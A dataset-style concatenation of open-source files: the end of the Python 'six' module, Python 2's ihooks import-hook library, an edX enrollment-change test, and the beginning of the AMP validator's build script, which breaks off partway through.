def add_metaclass(metaclass):
"""Class decorator for creating a class with a metaclass."""
def wrapper(cls):
orig_vars = cls.__dict__.copy()
slots = orig_vars.get('__slots__')
if slots is not None:
if isinstance(slots, str):
slots = [slots]
for slots_var in slots:
orig_vars.pop(slots_var)
orig_vars.pop('__dict__', None)
orig_vars.pop('__weakref__', None)
return metaclass(cls.__name__, cls.__bases__, orig_vars)
return wrapper
def python_2_unicode_compatible(klass):
"""
A decorator that defines __unicode__ and __str__ methods under Python 2.
Under Python 3 it does nothing.
To support Python 2 and 3 with a single code base, define a __str__ method
returning text and apply this decorator to the class.
"""
if PY2:
if '__str__' not in klass.__dict__:
raise ValueError("@python_2_unicode_compatible cannot be applied "
"to %s because it doesn't define __str__()." %
klass.__name__)
klass.__unicode__ = klass.__str__
klass.__str__ = lambda self: self.__unicode__().encode('utf-8')
return klass
# Complete the moves implementation.
# This code is at the end of this module to speed up module loading.
# Turn this module into a package.
__path__ = [] # required for PEP 302 and PEP 451
__package__ = __name__ # see PEP 366 @ReservedAssignment
if globals().get("__spec__") is not None:
__spec__.submodule_search_locations = [] # PEP 451 @UndefinedVariable
# Remove other six meta path importers, since they cause problems. This can
# happen if six is removed from sys.modules and then reloaded. (Setuptools does
# this for some reason.)
if sys.meta_path:
for i, importer in enumerate(sys.meta_path):
# Here's some real nastiness: Another "instance" of the six module might
# be floating around. Therefore, we can't use isinstance() to check for
# the six meta path importer, since the other six instance will have
# inserted an importer with different class.
if (type(importer).__name__ == "_SixMetaPathImporter" and
importer.name == __name__):
del sys.meta_path[i]
break
del i, importer
# Finally, add the importer to the meta path import hook.
sys.meta_path.append(_importer)
| apache-2.0 |
xfournet/intellij-community | python/lib/Lib/ihooks.py | 100 | 17335 | """Import hook support.
Consistent use of this module will make it possible to change the
different mechanisms involved in loading modules independently.
While the built-in module imp exports interfaces to the built-in
module searching and loading algorithm, and it is possible to replace
the built-in function __import__ in order to change the semantics of
the import statement, until now it has been difficult to combine the
effect of different __import__ hacks, like loading modules from URLs
by rimport.py, or restricted execution by rexec.py.
This module defines three new concepts:
1) A "file system hooks" class provides an interface to a filesystem.
One hooks class is defined (Hooks), which uses the interface provided
by standard modules os and os.path. It should be used as the base
class for other hooks classes.
2) A "module loader" class provides an interface to search for a
module in a search path and to load it. It defines a method which
searches for a module in a single directory; by overriding this method
one can redefine the details of the search. If the directory is None,
built-in and frozen modules are searched instead.
Two module loader class are defined, both implementing the search
strategy used by the built-in __import__ function: ModuleLoader uses
the imp module's find_module interface, while HookableModuleLoader
uses a file system hooks class to interact with the file system. Both
use the imp module's load_* interfaces to actually load the module.
3) A "module importer" class provides an interface to import a
module, as well as interfaces to reload and unload a module. It also
provides interfaces to install and uninstall itself instead of the
default __import__ and reload (and unload) functions.
One module importer class is defined (ModuleImporter), which uses a
module loader instance passed in (by default HookableModuleLoader is
instantiated).
The classes defined here should be used as base classes for extended
functionality along those lines.
If a module importer class supports dotted names, its import_module()
must return a different value depending on whether it is called on
behalf of a "from ... import ..." statement or not. (This is caused
by the way the __import__ hook is used by the Python interpreter.) It
would also do wise to install a different version of reload().
"""
import __builtin__
import imp
import os
import sys
__all__ = ["BasicModuleLoader","Hooks","ModuleLoader","FancyModuleLoader",
"BasicModuleImporter","ModuleImporter","install","uninstall"]
VERBOSE = 0
from imp import C_EXTENSION, PY_SOURCE, PY_COMPILED
from imp import C_BUILTIN, PY_FROZEN, PKG_DIRECTORY
BUILTIN_MODULE = C_BUILTIN
FROZEN_MODULE = PY_FROZEN
class _Verbose:
def __init__(self, verbose = VERBOSE):
self.verbose = verbose
def get_verbose(self):
return self.verbose
def set_verbose(self, verbose):
self.verbose = verbose
# XXX The following is an experimental interface
def note(self, *args):
if self.verbose:
self.message(*args)
def message(self, format, *args):
if args:
print format%args
else:
print format
class BasicModuleLoader(_Verbose):
"""Basic module loader.
This provides the same functionality as built-in import. It
doesn't deal with checking sys.modules -- all it provides is
find_module() and a load_module(), as well as find_module_in_dir()
which searches just one directory, and can be overridden by a
derived class to change the module search algorithm when the basic
dependency on sys.path is unchanged.
The interface is a little more convenient than imp's:
find_module(name, [path]) returns None or 'stuff', and
load_module(name, stuff) loads the module.
"""
def find_module(self, name, path = None):
if path is None:
path = [None] + self.default_path()
for dir in path:
stuff = self.find_module_in_dir(name, dir)
if stuff: return stuff
return None
def default_path(self):
return sys.path
def find_module_in_dir(self, name, dir):
if dir is None:
return self.find_builtin_module(name)
else:
try:
return imp.find_module(name, [dir])
except ImportError:
return None
def find_builtin_module(self, name):
# XXX frozen packages?
if imp.is_builtin(name):
return None, '', ('', '', BUILTIN_MODULE)
if imp.is_frozen(name):
return None, '', ('', '', FROZEN_MODULE)
return None
def load_module(self, name, stuff):
file, filename, info = stuff
try:
return imp.load_module(name, file, filename, info)
finally:
if file: file.close()
class Hooks(_Verbose):
"""Hooks into the filesystem and interpreter.
By deriving a subclass you can redefine your filesystem interface,
e.g. to merge it with the URL space.
This base class behaves just like the native filesystem.
"""
# imp interface
def get_suffixes(self): return imp.get_suffixes()
def new_module(self, name): return imp.new_module(name)
def is_builtin(self, name): return imp.is_builtin(name)
def init_builtin(self, name): return imp.init_builtin(name)
def is_frozen(self, name): return imp.is_frozen(name)
def init_frozen(self, name): return imp.init_frozen(name)
def get_frozen_object(self, name): return imp.get_frozen_object(name)
def load_source(self, name, filename, file=None):
return imp.load_source(name, filename, file)
def load_compiled(self, name, filename, file=None):
return imp.load_compiled(name, filename, file)
def load_dynamic(self, name, filename, file=None):
return imp.load_dynamic(name, filename, file)
def load_package(self, name, filename, file=None):
return imp.load_module(name, file, filename, ("", "", PKG_DIRECTORY))
def add_module(self, name):
d = self.modules_dict()
if name in d: return d[name]
d[name] = m = self.new_module(name)
return m
# sys interface
def modules_dict(self): return sys.modules
def default_path(self): return sys.path
def path_split(self, x): return os.path.split(x)
def path_join(self, x, y): return os.path.join(x, y)
def path_isabs(self, x): return os.path.isabs(x)
# etc.
def path_exists(self, x): return os.path.exists(x)
def path_isdir(self, x): return os.path.isdir(x)
def path_isfile(self, x): return os.path.isfile(x)
def path_islink(self, x): return os.path.islink(x)
# etc.
def openfile(self, *x): return open(*x)
openfile_error = IOError
def listdir(self, x): return os.listdir(x)
listdir_error = os.error
# etc.
class ModuleLoader(BasicModuleLoader):
"""Default module loader; uses file system hooks.
By defining suitable hooks, you might be able to load modules from
other sources than the file system, e.g. from compressed or
encrypted files, tar files or (if you're brave!) URLs.
"""
def __init__(self, hooks = None, verbose = VERBOSE):
BasicModuleLoader.__init__(self, verbose)
self.hooks = hooks or Hooks(verbose)
def default_path(self):
return self.hooks.default_path()
def modules_dict(self):
return self.hooks.modules_dict()
def get_hooks(self):
return self.hooks
def set_hooks(self, hooks):
self.hooks = hooks
def find_builtin_module(self, name):
# XXX frozen packages?
if self.hooks.is_builtin(name):
return None, '', ('', '', BUILTIN_MODULE)
if self.hooks.is_frozen(name):
return None, '', ('', '', FROZEN_MODULE)
return None
def find_module_in_dir(self, name, dir, allow_packages=1):
if dir is None:
return self.find_builtin_module(name)
if allow_packages:
fullname = self.hooks.path_join(dir, name)
if self.hooks.path_isdir(fullname):
stuff = self.find_module_in_dir("__init__", fullname, 0)
if stuff:
file = stuff[0]
if file: file.close()
return None, fullname, ('', '', PKG_DIRECTORY)
for info in self.hooks.get_suffixes():
suff, mode, type = info
fullname = self.hooks.path_join(dir, name+suff)
try:
fp = self.hooks.openfile(fullname, mode)
return fp, fullname, info
except self.hooks.openfile_error:
pass
return None
def load_module(self, name, stuff):
file, filename, info = stuff
(suff, mode, type) = info
try:
if type == BUILTIN_MODULE:
return self.hooks.init_builtin(name)
if type == FROZEN_MODULE:
return self.hooks.init_frozen(name)
if type == C_EXTENSION:
m = self.hooks.load_dynamic(name, filename, file)
elif type == PY_SOURCE:
m = self.hooks.load_source(name, filename, file)
elif type == PY_COMPILED:
m = self.hooks.load_compiled(name, filename, file)
elif type == PKG_DIRECTORY:
m = self.hooks.load_package(name, filename, file)
else:
raise ImportError, "Unrecognized module type (%r) for %s" % \
(type, name)
finally:
if file: file.close()
m.__file__ = filename
return m
class FancyModuleLoader(ModuleLoader):
"""Fancy module loader -- parses and execs the code itself."""
def load_module(self, name, stuff):
file, filename, (suff, mode, type) = stuff
realfilename = filename
path = None
if type == PKG_DIRECTORY:
initstuff = self.find_module_in_dir("__init__", filename, 0)
if not initstuff:
raise ImportError, "No __init__ module in package %s" % name
initfile, initfilename, initinfo = initstuff
initsuff, initmode, inittype = initinfo
if inittype not in (PY_COMPILED, PY_SOURCE):
if initfile: initfile.close()
raise ImportError, \
"Bad type (%r) for __init__ module in package %s" % (
inittype, name)
path = [filename]
file = initfile
realfilename = initfilename
type = inittype
if type == FROZEN_MODULE:
code = self.hooks.get_frozen_object(name)
elif type == PY_COMPILED:
import marshal
file.seek(8)
code = marshal.load(file)
elif type == PY_SOURCE:
data = file.read()
code = compile(data, realfilename, 'exec')
else:
return ModuleLoader.load_module(self, name, stuff)
m = self.hooks.add_module(name)
if path:
m.__path__ = path
m.__file__ = filename
try:
exec code in m.__dict__
except:
d = self.hooks.modules_dict()
if name in d:
del d[name]
raise
return m
class BasicModuleImporter(_Verbose):
"""Basic module importer; uses module loader.
This provides basic import facilities but no package imports.
"""
def __init__(self, loader = None, verbose = VERBOSE):
_Verbose.__init__(self, verbose)
self.loader = loader or ModuleLoader(None, verbose)
self.modules = self.loader.modules_dict()
def get_loader(self):
return self.loader
def set_loader(self, loader):
self.loader = loader
def get_hooks(self):
return self.loader.get_hooks()
def set_hooks(self, hooks):
return self.loader.set_hooks(hooks)
def import_module(self, name, globals={}, locals={}, fromlist=[]):
name = str(name)
if name in self.modules:
return self.modules[name] # Fast path
stuff = self.loader.find_module(name)
if not stuff:
raise ImportError, "No module named %s" % name
return self.loader.load_module(name, stuff)
def reload(self, module, path = None):
name = str(module.__name__)
stuff = self.loader.find_module(name, path)
if not stuff:
raise ImportError, "Module %s not found for reload" % name
return self.loader.load_module(name, stuff)
def unload(self, module):
del self.modules[str(module.__name__)]
# XXX Should this try to clear the module's namespace?
def install(self):
self.save_import_module = __builtin__.__import__
self.save_reload = __builtin__.reload
if not hasattr(__builtin__, 'unload'):
__builtin__.unload = None
self.save_unload = __builtin__.unload
__builtin__.__import__ = self.import_module
__builtin__.reload = self.reload
__builtin__.unload = self.unload
def uninstall(self):
__builtin__.__import__ = self.save_import_module
__builtin__.reload = self.save_reload
__builtin__.unload = self.save_unload
if not __builtin__.unload:
del __builtin__.unload
class ModuleImporter(BasicModuleImporter):
"""A module importer that supports packages."""
def import_module(self, name, globals=None, locals=None, fromlist=None):
parent = self.determine_parent(globals)
q, tail = self.find_head_package(parent, str(name))
m = self.load_tail(q, tail)
if not fromlist:
return q
if hasattr(m, "__path__"):
self.ensure_fromlist(m, fromlist)
return m
def determine_parent(self, globals):
if not globals or not "__name__" in globals:
return None
pname = globals['__name__']
if "__path__" in globals:
parent = self.modules[pname]
assert globals is parent.__dict__
return parent
if '.' in pname:
i = pname.rfind('.')
pname = pname[:i]
parent = self.modules[pname]
assert parent.__name__ == pname
return parent
return None
def find_head_package(self, parent, name):
if '.' in name:
i = name.find('.')
head = name[:i]
tail = name[i+1:]
else:
head = name
tail = ""
if parent:
qname = "%s.%s" % (parent.__name__, head)
else:
qname = head
q = self.import_it(head, qname, parent)
if q: return q, tail
if parent:
qname = head
parent = None
q = self.import_it(head, qname, parent)
if q: return q, tail
raise ImportError, "No module named " + qname
def load_tail(self, q, tail):
m = q
while tail:
i = tail.find('.')
if i < 0: i = len(tail)
head, tail = tail[:i], tail[i+1:]
mname = "%s.%s" % (m.__name__, head)
m = self.import_it(head, mname, m)
if not m:
raise ImportError, "No module named " + mname
return m
def ensure_fromlist(self, m, fromlist, recursive=0):
for sub in fromlist:
if sub == "*":
if not recursive:
try:
all = m.__all__
except AttributeError:
pass
else:
self.ensure_fromlist(m, all, 1)
continue
if sub != "*" and not hasattr(m, sub):
subname = "%s.%s" % (m.__name__, sub)
submod = self.import_it(sub, subname, m)
if not submod:
raise ImportError, "No module named " + subname
def import_it(self, partname, fqname, parent, force_load=0):
if not partname:
raise ValueError, "Empty module name"
if not force_load:
try:
return self.modules[fqname]
except KeyError:
pass
try:
path = parent and parent.__path__
except AttributeError:
return None
partname = str(partname)
stuff = self.loader.find_module(partname, path)
if not stuff:
return None
fqname = str(fqname)
m = self.loader.load_module(fqname, stuff)
if parent:
setattr(parent, partname, m)
return m
def reload(self, module):
name = str(module.__name__)
if '.' not in name:
return self.import_it(name, name, None, force_load=1)
i = name.rfind('.')
pname = name[:i]
parent = self.modules[pname]
return self.import_it(name[i+1:], name, parent, force_load=1)
default_importer = None
current_importer = None
def install(importer = None):
global current_importer
current_importer = importer or default_importer or ModuleImporter()
current_importer.install()
def uninstall():
global current_importer
current_importer.uninstall()
| apache-2.0 |
pepeportela/edx-platform | common/djangoapps/student/management/tests/test_change_enrollment.py | 44 | 4210 | """ Test the change_enrollment command line script."""
import ddt
from mock import patch
from django.core.management import call_command
from xmodule.modulestore.tests.factories import CourseFactory
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from student.tests.factories import UserFactory, CourseModeFactory
from student.models import CourseEnrollment
@ddt.ddt
class ChangeEnrollmentTests(SharedModuleStoreTestCase):
""" Test the enrollment change functionality of the change_enrollment script."""
def setUp(self):
super(ChangeEnrollmentTests, self).setUp()
self.course = CourseFactory.create()
self.audit_mode = CourseModeFactory.create(
course_id=self.course.id,
mode_slug='audit',
mode_display_name='Audit',
)
self.honor_mode = CourseModeFactory.create(
course_id=self.course.id,
mode_slug='honor',
mode_display_name='Honor',
)
self.user_info = [
('amy', 'amy@pond.com', 'password'),
('rory', 'rory@theroman.com', 'password'),
('river', 'river@song.com', 'password')
]
self.enrollments = []
self.users = []
for username, email, password in self.user_info:
user = UserFactory.create(username=username, email=email, password=password)
self.users.append(user)
self.enrollments.append(CourseEnrollment.enroll(user, self.course.id, mode='audit'))
@patch('student.management.commands.change_enrollment.logger')
@ddt.data(
('email', False, 3),
('username', False, 3),
('email', True, 0),
('username', True, 0),
)
@ddt.unpack
def test_convert_users(self, method, noop, expected_conversions, mock_logger):
""" The command should update the user's enrollment. """
user_str = ','.join([getattr(user, method) for user in self.users])
user_ids = [u.id for u in self.users]
command_args = {
'course_id': unicode(self.course.id),
'to_mode': 'honor',
'from_mode': 'audit',
'noop': noop,
method: user_str,
}
# Verify users are not in honor mode yet
self.assertEqual(
len(CourseEnrollment.objects.filter(mode='honor', user_id__in=user_ids)),
0
)
call_command(
'change_enrollment',
**command_args
)
# Verify correct number of users are now in honor mode
self.assertEqual(
len(CourseEnrollment.objects.filter(mode='honor', user_id__in=user_ids)),
expected_conversions
)
mock_logger.info.assert_called_with(
'Successfully updated %i out of %i users',
len(self.users),
len(self.users)
)
@patch('student.management.commands.change_enrollment.logger')
@ddt.data(
('email', 'dtennant@thedoctor.com', 3),
('username', 'dtennant', 3),
)
@ddt.unpack
def test_user_not_found(self, method, fake_user, expected_success, mock_logger):
all_users = [getattr(user, method) for user in self.users]
all_users.append(fake_user)
user_str = ','.join(all_users)
real_user_ids = [u.id for u in self.users]
command_args = {
'course_id': unicode(self.course.id),
'to_mode': 'honor',
'from_mode': 'audit',
method: user_str,
}
# Verify users are not in honor mode yet
self.assertEqual(
len(CourseEnrollment.objects.filter(mode='honor', user_id__in=real_user_ids)),
0
)
call_command(
'change_enrollment',
**command_args
)
# Verify correct number of users are now in honor mode
self.assertEqual(
len(CourseEnrollment.objects.filter(mode='honor', user_id__in=real_user_ids)),
expected_success
)
mock_logger.info.assert_called_with(
'user: [%s] reason: [%s] %s', fake_user, 'DoesNotExist', 'User matching query does not exist.'
)
| agpl-3.0 |
jlucero-contentad/amphtml | validator/build.py | 17 | 19699 | #!/usr/bin/python2.7
#
# Copyright 2015 The AMP HTML Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the license.
#
"""A build script which (thus far) works on Ubuntu 14."""
import glob
import logging
import os
import platform
import re
import shutil
import subprocess
import sys
import tempfile
def Die(msg):
"""Prints error and exits with status 1.
Args:
msg: The error message to emit
"""
print >> sys.stderr, msg
sys.exit(1)
def GetNodeJsCmd():
"""Ensure Node.js is installed and return the proper command to run."""
logging.info('entering ...')
for cmd in ['node', 'nodejs']:
try:
output = subprocess.check_output([cmd, '--eval', 'console.log("42")'])
if output.strip() == '42':
logging.info('... done')
return cmd
except (subprocess.CalledProcessError, OSError):
continue
Die('Node.js not found. Try "apt-get install nodejs".')
def CheckPrereqs():
"""Checks that various prerequisites for this script are satisfied."""
logging.info('entering ...')
if platform.system() != 'Linux' and platform.system() != 'Darwin':
Die('Sorry, this script assumes Linux or Mac OS X thus far. '
'Please feel free to edit the source and fix it to your needs.')
# Ensure source files are available.
for f in ['validator-main.protoascii', 'validator.proto',
'validator_gen_js.py', 'package.json', 'engine/validator.js',
'engine/validator_test.js', 'engine/validator-in-browser.js',
'engine/tokenize-css.js', 'engine/parse-css.js',
'engine/parse-srcset.js', 'engine/parse-url.js']:
if not os.path.exists(f):
Die('%s not found. Must run in amp_validator source directory.' % f)
# Ensure protoc is available.
try:
libprotoc_version = subprocess.check_output(['protoc', '--version'])
except (subprocess.CalledProcessError, OSError):
Die('Protobuf compiler not found. Try "apt-get install protobuf-compiler".')
# Ensure 'libprotoc 2.5.0' or newer.
m = re.search('^(\\w+) (\\d+)\\.(\\d+)\\.(\\d+)', libprotoc_version)
if (m.group(1) != 'libprotoc' or
(int(m.group(2)), int(m.group(3)), int(m.group(4))) < (2, 5, 0)):
Die('Expected libprotoc 2.5.0 or newer, saw: %s' % libprotoc_version)
# Ensure that the Python protobuf package is installed.
for m in ['descriptor', 'text_format']:
module = 'google.protobuf.%s' % m
try:
__import__(module)
except ImportError:
Die('%s not found. Try "apt-get install python-protobuf"' % module)
# Ensure that npm is installed.
try:
npm_version = subprocess.check_output(['npm', '--version'])
except (subprocess.CalledProcessError, OSError):
Die('npm package manager not found. Try "apt-get install npm".')
# Ensure npm version '1.3.10' or newer.
m = re.search('^(\\d+)\\.(\\d+)\\.(\\d+)$', npm_version)
if (int(m.group(1)), int(m.group(2)), int(m.group(3))) < (1, 3, 10):
Die('Expected npm version 1.3.10 or newer, saw: %s' % npm_version)
# Ensure JVM installed. TODO: Check for version?
try:
subprocess.check_output(['java', '-version'], stderr=subprocess.STDOUT)
except (subprocess.CalledProcessError, OSError):
Die('Java missing. Try "apt-get install openjdk-7-jre"')
logging.info('... done')
def SetupOutDir(out_dir):
"""Sets up a clean output directory.
Args:
out_dir: directory name of the output directory. Must not have slashes,
dots, etc.
"""
logging.info('entering ...')
assert re.match(r'^[a-zA-Z_\-0-9]+$', out_dir), 'bad out_dir: %s' % out_dir
if os.path.exists(out_dir):
subprocess.check_call(['rm', '-rf', out_dir])
os.mkdir(out_dir)
logging.info('... done')
def InstallNodeDependencies():
"""Installs the dependencies using npm."""
logging.info('entering ...')
# Install the project dependencies specified in package.json into
# node_modules.
logging.info('installing AMP Validator engine dependencies ...')
subprocess.check_call(['npm', 'install'])
logging.info('installing AMP Validator nodejs dependencies ...')
subprocess.check_call(['npm', 'install'], cwd='nodejs')
logging.info('... done')
def GenValidatorPb2Py(out_dir):
"""Calls the proto compiler to generate validator_pb2.py.
Args:
out_dir: directory name of the output directory. Must not have slashes,
dots, etc.
"""
logging.info('entering ...')
assert re.match(r'^[a-zA-Z_\-0-9]+$', out_dir), 'bad out_dir: %s' % out_dir
subprocess.check_call(['protoc', 'validator.proto',
'--python_out=%s' % out_dir])
open('%s/__init__.py' % out_dir, 'w').close()
logging.info('... done')
def GenValidatorProtoascii(out_dir):
"""Assembles the validator protoascii file from the main and extensions.
Args:
out_dir: directory name of the output directory. Must not have slashes,
dots, etc.
"""
logging.info('entering ...')
assert re.match(r'^[a-zA-Z_\-0-9]+$', out_dir), 'bad out_dir: %s' % out_dir
protoascii_segments = [open('validator-main.protoascii').read()]
extensions = glob.glob('extensions/*/0.1/validator-*.protoascii')
# In the Github project, the extensions are located in a sibling directory
# to the validator rather than a child directory.
if not extensions:
extensions = glob.glob('../extensions/*/0.1/validator-*.protoascii')
extensions.sort()
for extension in extensions:
protoascii_segments.append(open(extension).read())
f = open('%s/validator.protoascii' % out_dir, 'w')
f.write(''.join(protoascii_segments))
f.close()
logging.info('... done')
def GenValidatorGeneratedJs(out_dir):
"""Calls validator_gen_js to generate validator-generated.js.
Args:
out_dir: directory name of the output directory. Must not have slashes,
dots, etc.
"""
logging.info('entering ...')
assert re.match(r'^[a-zA-Z_\-0-9]+$', out_dir), 'bad out_dir: %s' % out_dir
# These imports happen late, within this method because they don't necessarily
# exist when the module starts running, and the ones that probably do
# are checked by CheckPrereqs.
from google.protobuf import text_format
from google.protobuf import descriptor
from dist import validator_pb2
import validator_gen_js
out = []
validator_gen_js.GenerateValidatorGeneratedJs(
specfile='%s/validator.protoascii' % out_dir,
validator_pb2=validator_pb2,
text_format=text_format,
descriptor=descriptor,
out=out)
out.append('')
f = open('%s/validator-generated.js' % out_dir, 'w')
f.write('\n'.join(out))
f.close()
logging.info('... done')
def GenValidatorGeneratedMd(out_dir):
"""Calls validator_gen_md to generate validator-generated.md.
Args:
out_dir: directory name of the output directory. Must not have slashes,
dots, etc.
"""
logging.info('entering ...')
assert re.match(r'^[a-zA-Z_\-0-9]+$', out_dir), 'bad out_dir: %s' % out_dir
# These imports happen late, within this method because they don't necessarily
# exist when the module starts running, and the ones that probably do
# are checked by CheckPrereqs.
from google.protobuf import text_format
from dist import validator_pb2
import validator_gen_md
out = []
validator_gen_md.GenerateValidatorGeneratedMd(
specfile='%s/validator.protoascii' % out_dir,
validator_pb2=validator_pb2,
text_format=text_format,
out=out)
out.append('')
f = open('%s/validator-generated.md' % out_dir, 'w')
f.write('\n'.join(out))
f.close()
logging.info('... done')
def CompileWithClosure(js_files, closure_entry_points, output_file):
"""Compiles the arguments with the Closure compiler for transpilation to ES5.
Args:
js_files: list of files to compile
closure_entry_points: entry points (these won't be minimized)
output_file: name of the Javascript output file
"""
cmd = ['java', '-jar', 'node_modules/google-closure-compiler/compiler.jar',
'--language_in=ECMASCRIPT6_STRICT', '--language_out=ES5_STRICT',
'--js_output_file=%s' % output_file, '--only_closure_dependencies']
cmd += ['--closure_entry_point=%s' % e for e in closure_entry_points]
cmd += ['node_modules/google-closure-library/closure/**.js',
'!node_modules/google-closure-library/closure/**_test.js',
'node_modules/google-closure-library/third_party/closure/**.js',
'!node_modules/google-closure-library/third_party/closure/**_test.js']
cmd += js_files
subprocess.check_call(cmd)
def CompileValidatorMinified(out_dir):
"""Generates a minified validator script, which can be imported to validate.
Args:
out_dir: output directory
"""
logging.info('entering ...')
CompileWithClosure(
js_files=['engine/htmlparser.js', 'engine/parse-css.js',
'engine/parse-srcset.js', 'engine/parse-url.js',
'engine/tokenize-css.js',
'%s/validator-generated.js' % out_dir,
'engine/validator-in-browser.js', 'engine/validator.js',
'engine/amp4ads-parse-css.js', 'engine/dom-walker.js',
'engine/htmlparser-interface.js'],
closure_entry_points=['amp.validator.validateString',
'amp.validator.renderValidationResult',
'amp.validator.renderErrorMessage'],
output_file='%s/validator_minified.js' % out_dir)
logging.info('... done')
def RunSmokeTest(out_dir, nodejs_cmd):
"""Runs a smoke test (minimum valid AMP and empty html file).
Args:
out_dir: output directory
nodejs_cmd: the command for calling Node.js
"""
logging.info('entering ...')
# Run index.js on the minimum valid amp and observe that it passes.
p = subprocess.Popen(
[nodejs_cmd, 'nodejs/index.js', '--validator_js',
'%s/validator_minified.js' % out_dir,
'testdata/feature_tests/minimum_valid_amp.html'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
if ('testdata/feature_tests/minimum_valid_amp.html: PASS\n', '', p.returncode
) != (stdout, stderr, 0):
Die('Smoke test failed. returncode=%d stdout="%s" stderr="%s"' %
(p.returncode, stdout, stderr))
# Run index.js on an empty file and observe that it fails.
p = subprocess.Popen(
[nodejs_cmd, 'nodejs/index.js', '--validator_js',
'%s/validator_minified.js' % out_dir,
'testdata/feature_tests/empty.html'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
if p.returncode != 1:
Die('smoke test failed. Expected p.returncode==1, saw: %s' % p.returncode)
if not stderr.startswith('testdata/feature_tests/empty.html:1:0 '
'The mandatory tag \'html'):
Die('smoke test failed; stderr was: "%s"' % stderr)
logging.info('... done')
def RunIndexTest(nodejs_cmd):
"""Runs the index_test.js, which tests the NodeJS API.
Args:
nodejs_cmd: the command for calling Node.js
"""
logging.info('entering ...')
p = subprocess.Popen(
[nodejs_cmd, './index_test.js'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd='nodejs')
(stdout, stderr) = p.communicate()
if p.returncode != 0:
Die('index_test.js failed. returncode=%d stdout="%s" stderr="%s"' %
(p.returncode, stdout, stderr))
logging.info('... done')
def CompileValidatorTestMinified(out_dir):
"""Runs closure compiler for validator_test.js.
Args:
out_dir: directory name of the output directory. Must not have slashes,
dots, etc.
"""
logging.info('entering ...')
CompileWithClosure(
js_files=['engine/htmlparser.js', 'engine/parse-css.js',
'engine/parse-srcset.js', 'engine/parse-url.js',
'engine/tokenize-css.js',
'%s/validator-generated.js' % out_dir,
'engine/validator-in-browser.js', 'engine/validator.js',
'engine/amp4ads-parse-css.js', 'engine/htmlparser-interface.js',
'engine/dom-walker.js', 'engine/validator_test.js'],
closure_entry_points=['amp.validator.ValidatorTest'],
output_file='%s/validator_test_minified.js' % out_dir)
logging.info('... success')
def CompileValidatorLightTestMinified(out_dir):
"""Runs closure compiler for validator-light_test.js.
Args:
out_dir: directory name of the output directory. Must not have slashes,
dots, etc.
"""
logging.info('entering ...')
CompileWithClosure(
js_files=['engine/htmlparser.js', 'engine/parse-css.js',
'engine/parse-srcset.js', 'engine/parse-url.js',
'engine/tokenize-css.js', '%s/validator-generated.js' % out_dir,
'engine/validator-in-browser.js', 'engine/validator.js',
'engine/amp4ads-parse-css.js', 'engine/htmlparser-interface.js',
'engine/dom-walker.js', 'engine/validator-light_test.js'],
closure_entry_points=['amp.validator.ValidatorTest'],
output_file='%s/validator-light_test_minified.js' % out_dir)
logging.info('... success')
def CompileHtmlparserTestMinified(out_dir):
"""Runs closure compiler for htmlparser_test.js.
Args:
out_dir: directory name of the output directory. Must not have slashes,
dots, etc.
"""
logging.info('entering ...')
CompileWithClosure(
js_files=['engine/htmlparser.js', 'engine/htmlparser-interface.js',
'engine/htmlparser_test.js'],
closure_entry_points=['amp.htmlparser.HtmlParserTest'],
output_file='%s/htmlparser_test_minified.js' % out_dir)
logging.info('... success')
def CompileParseCssTestMinified(out_dir):
"""Runs closure compiler for parse-css_test.js.
Args:
out_dir: directory name of the output directory. Must not have slashes,
dots, etc.
"""
logging.info('entering ...')
CompileWithClosure(
js_files=['engine/parse-css.js', 'engine/parse-url.js',
'engine/tokenize-css.js', 'engine/css-selectors.js',
'engine/json-testutil.js', 'engine/parse-css_test.js',
'%s/validator-generated.js' % out_dir],
closure_entry_points=['parse_css.ParseCssTest'],
output_file='%s/parse-css_test_minified.js' % out_dir)
logging.info('... success')
def CompileParseUrlTestMinified(out_dir):
"""Runs closure compiler for parse-url_test.js.
Args:
out_dir: directory name of the output directory. Must not have slashes,
dots, etc.
"""
logging.info('entering ...')
CompileWithClosure(
js_files=['engine/parse-url.js', 'engine/parse-css.js',
'engine/tokenize-css.js', 'engine/css-selectors.js',
'engine/json-testutil.js', 'engine/parse-url_test.js',
'%s/validator-generated.js' % out_dir],
closure_entry_points=['parse_url.ParseURLTest'],
output_file='%s/parse-url_test_minified.js' % out_dir)
logging.info('... success')
def CompileAmp4AdsParseCssTestMinified(out_dir):
"""Runs closure compiler for amp4ads-parse-css_test.js.
Args:
out_dir: directory name of the output directory. Must not have slashes,
dots, etc.
"""
logging.info('entering ...')
CompileWithClosure(
js_files=['engine/amp4ads-parse-css_test.js', 'engine/parse-css.js',
'engine/parse-url.js', 'engine/amp4ads-parse-css.js',
'engine/tokenize-css.js', 'engine/css-selectors.js',
'engine/json-testutil.js',
'%s/validator-generated.js' % out_dir],
closure_entry_points=['parse_css.Amp4AdsParseCssTest'],
output_file='%s/amp4ads-parse-css_test_minified.js' % out_dir)
logging.info('... success')
def CompileParseSrcsetTestMinified(out_dir):
"""Runs closure compiler for parse-srcset_test.js.
Args:
out_dir: directory name of the output directory. Must not have slashes,
dots, etc.
"""
logging.info('entering ...')
CompileWithClosure(
js_files=['engine/parse-srcset.js', 'engine/json-testutil.js',
'engine/parse-srcset_test.js',
'%s/validator-generated.js' % out_dir],
closure_entry_points=['parse_srcset.ParseSrcsetTest'],
output_file='%s/parse-srcset_test_minified.js' % out_dir)
logging.info('... success')
def GenerateTestRunner(out_dir):
"""Generates a test runner: a nodejs script that runs our minified tests.
Args:
out_dir: directory name of the output directory. Must not have slashes,
dots, etc.
"""
logging.info('entering ...')
f = open('%s/test_runner' % out_dir, 'w')
extensions_dir = 'extensions'
# In the Github project, the extensions are located in a sibling directory
# to the validator rather than a child directory.
if not os.path.isdir(extensions_dir):
extensions_dir = '../extensions'
f.write("""#!/usr/bin/nodejs
global.assert = require('assert');
global.fs = require('fs');
global.path = require('path');
var JasmineRunner = require('jasmine');
var jasmine = new JasmineRunner();
